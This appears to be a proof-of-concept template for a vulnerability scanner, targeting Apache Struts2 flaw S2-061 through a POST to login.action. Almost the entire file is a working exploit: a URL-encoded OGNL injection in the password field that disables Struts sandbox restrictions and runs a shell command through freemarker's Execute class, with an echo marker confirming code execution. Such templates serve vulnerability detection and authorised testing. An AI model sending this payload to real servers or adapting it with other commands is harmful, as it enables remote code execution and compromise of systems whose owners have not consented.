<DudePoc_Name>S2_061</DudePoc_Name>
<DudePoc_Description></DudePoc_Description>
<DudePoc_SetHeader>
POST /login.action HTTP/1.1
Content-type : application/x-www-form-urlencoded
Host: $<AttackHost>$
Content-Length: 0
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>
username=111111&password=%7B%28%23request.map%3D%23%40org.apache.commons.collections.BeanMap%40%7B%7D%29.toString%28%29.substring%280%2C0%29+%2B%28%23request.map.setBean%28%23request.get%28%27struts.valueStack%27%29%29+%3D%3D+true%29.toString%28%29.substring%280%2C0%29+%2B%28%23request.map2%3D%23%40org.apache.commons.collections.BeanMap%40%7B%7D%29.toString%28%29.substring%280%2C0%29+%2B%28%23request.map2.setBean%28%23request.get%28%27map%27%29.get%28%27context%27%29%29+%3D%3D+true%29.toString%28%29.substring%280%2C0%29+%2B%28%23request.map3%3D%23%40org.apache.commons.collections.BeanMap%40%7B%7D%29.toString%28%29.substring%280%2C0%29+%2B%28%23request.map3.setBean%28%23request.get%28%27map2%27%29.get%28%27memberAccess%27%29%29+%3D%3D+true%29.toString%28%29.substring%280%2C0%29+%2B%28%23request.get%28%27map3%27%29.put%28%27excludedPackageNames%27%2C%23%40org.apache.commons.collections.BeanMap%40%7B%7D.keySet%28%29%29+%3D%3D+true%29.toString%28%29.substring%280%2C0%29+%2B%28%23request.get%28%27map3%27%29.put%28%27excludedClasses%27%2C%23%40org.apache.commons.collections.BeanMap%40%7B%7D.keySet%28%29%29+%3D%3D+true%29.toString%28%29.substring%280%2C0%29+%2B%28%23application.get%28%27org.apache.tomcat.InstanceManager%27%29.newInstance%28%27freemarker.template.utility.Execute%27%29.exec%28%7B%27echo+78468794903108696%27%7D%29%29%7D
</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>78468794903108696</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
